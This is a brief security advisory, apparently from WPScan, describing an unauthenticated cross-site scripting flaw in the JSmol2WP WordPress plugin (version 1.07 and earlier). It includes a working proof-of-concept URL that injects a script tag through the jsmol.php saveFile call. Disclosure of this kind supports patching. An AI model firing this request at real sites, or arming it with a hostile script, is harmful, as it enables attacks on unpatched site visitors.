JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)

Description

The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert(/xss/)%3C/script%3E&mimetype=text/html;%20charset=utf-8 

References

https://wpscan.com/vulnerability/0bbf1542-6e00-4a68-97f6-48a7790d1c3e